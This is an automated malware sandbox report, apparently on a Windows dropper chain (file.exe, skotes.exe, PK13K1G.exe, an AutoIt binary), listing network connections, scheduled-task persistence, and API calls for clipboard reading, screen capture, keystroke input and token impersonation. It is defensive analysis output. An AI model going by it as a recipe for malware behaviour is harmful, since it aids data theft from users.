Source: unknown	Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50316
Source: unknown	Network traffic detected: HTTP traffic on port 50256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50319
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50318
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50311
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50310
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50313
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50312
Source: unknown	Network traffic detected: HTTP traffic on port 50179 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 50349 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50325
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50328
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50327
Source: unknown	Network traffic detected: HTTP traffic on port 50284 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50316 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50320
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50324
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50239 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50409 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50273 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50327 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50344 -> 443

Source: unknown	HTTPS traffic detected: 104.21.67.145:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49926 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49927 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49932 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:49941 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49953 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.10.31:443 -> 192.168.2.4:49964 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50054 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50053 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50056 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.193.91:443 -> 192.168.2.4:50061 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50062 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50064 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50065 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50068 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50069 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50070 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50131 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50130 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50129 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50227 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50230 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50228 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50229 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50261 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50264 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50265 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50275 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50276 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50283 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50284 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50306 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50312 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50313 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50319 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50318 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50327 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50328 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50341 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50343 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.91:443 -> 192.168.2.4:50345 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50346 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50347 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50349 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50348 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50364 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50362 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50363 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50361 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50408 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50412 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50411 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50409 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50407 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50410 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe

Code function: 8_2_00430FD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

8_2_00430FD0

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_0104ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

9_2_0104ED6A

Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe

Code function: 8_2_00430FD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

8_2_00430FD0

Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe

Code function: 8_2_00431862 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

8_2_00431862

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_0103AB9C GetKeyState,GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

9_2_0103AB9C

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_01069576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

9_2_01069576

System Summary

Binary is likely a compiled AutoIt script file

Source: 8ed1a1ded0.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 8ed1a1ded0.exe, 00000009.00000000.2460183750.0000000001092000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_56fdf5eb-6
Source: 8ed1a1ded0.exe, 00000009.00000000.2460183750.0000000001092000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_872c3fca-c
Source: 8ed1a1ded0.exe, 0000001C.00000000.2580231186.0000000001092000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_58d016e1-0
Source: 8ed1a1ded0.exe, 0000001C.00000000.2580231186.0000000001092000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_1079d340-6
Source: 8ed1a1ded0.exe, 00000020.00000002.2836034761.0000000001092000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_1bbcb259-1
Source: 8ed1a1ded0.exe, 00000020.00000002.2836034761.0000000001092000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_0766fcc0-6

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.5.dr	Static PE information: section name:
Source: random[1].exe.5.dr	Static PE information: section name: .idata
Source: random[1].exe.5.dr	Static PE information: section name:
Source: random[1].exe0.5.dr	Static PE information: section name:
Source: random[1].exe0.5.dr	Static PE information: section name: .idata
Source: acdee533dd.exe.5.dr	Static PE information: section name:
Source: acdee533dd.exe.5.dr	Static PE information: section name: .idata
Source: acdee533dd.exe.5.dr	Static PE information: section name:
Source: random[1].exe2.5.dr	Static PE information: section name:
Source: random[1].exe2.5.dr	Static PE information: section name: .idata
Source: e2def46cb9.exe.5.dr	Static PE information: section name:
Source: e2def46cb9.exe.5.dr	Static PE information: section name: .idata

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_0103D5EB: CreateFileW,DeviceIoControl,CloseHandle,

9_2_0103D5EB

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_01031201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

9_2_01031201

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_0103E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

9_2_0103E8F6

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ED5C83	0_2_00ED5C83
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ED735A	0_2_00ED735A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F18860	0_2_00F18860
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ED4DE0	0_2_00ED4DE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE7B6E	0_2_00FE7B6E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ED4B30	0_2_00ED4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00F678BB	1_2_00F678BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00F68860	1_2_00F68860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00F67049	1_2_00F67049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00F631A8	1_2_00F631A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00F24B30	1_2_00F24B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00F24DE0	1_2_00F24DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00F62D10	1_2_00F62D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00F6779B	1_2_00F6779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00F57F36	1_2_00F57F36
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 6_2_00021000	6_2_00021000
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 6_2_00025235	6_2_00025235
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 6_2_00031542	6_2_00031542
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00021000	8_2_00021000
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00025235	8_2_00025235
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00031542	8_2_00031542
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0040AAA0	8_2_0040AAA0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0040B2AE	8_2_0040B2AE
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_004087F0	8_2_004087F0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00424040	8_2_00424040
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0043D050	8_2_0043D050
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0040F85E	8_2_0040F85E
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00434067	8_2_00434067
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00427073	8_2_00427073
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0043B820	8_2_0043B820
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_004280D8	8_2_004280D8
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_004158DC	8_2_004158DC
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_004038F0	8_2_004038F0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0041D8F0	8_2_0041D8F0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_004198A0	8_2_004198A0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0042F0B0	8_2_0042F0B0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_004110BF	8_2_004110BF
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00405940	8_2_00405940
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0041D170	8_2_0041D170
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0040D926	8_2_0040D926
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_004351C0	8_2_004351C0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0043D9C0	8_2_0043D9C0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_004229DD	8_2_004229DD
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0042A1F0	8_2_0042A1F0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00428992	8_2_00428992
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_004061A0	8_2_004061A0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00422270	8_2_00422270
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0042CA09	8_2_0042CA09
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00416ADD	8_2_00416ADD
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0043BAF0	8_2_0043BAF0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00430A83	8_2_00430A83
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00435A80	8_2_00435A80
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_004042A0	8_2_004042A0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_004152BB	8_2_004152BB
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0041BB41	8_2_0041BB41
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00419364	8_2_00419364
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00409300	8_2_00409300
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00411B00	8_2_00411B00
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0041DB10	8_2_0041DB10
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0043D310	8_2_0043D310
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0042AB32	8_2_0042AB32
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00426BD7	8_2_00426BD7
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_004233EF	8_2_004233EF
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_004263B0	8_2_004263B0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00423BB0	8_2_00423BB0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00423E90	8_2_00423E90
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0041F409	8_2_0041F409
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00407410	8_2_00407410
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0043BC10	8_2_0043BC10
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00436410	8_2_00436410
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00404C30	8_2_00404C30
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00438C30	8_2_00438C30
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00436CD8	8_2_00436CD8
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_004254E0	8_2_004254E0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00422CA2	8_2_00422CA2
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0040CCAF	8_2_0040CCAF
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00424D27	8_2_00424D27
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00428538	8_2_00428538
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0040BD3D	8_2_0040BD3D
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00430DC0	8_2_00430DC0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00421640	8_2_00421640
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0043BE60	8_2_0043BE60
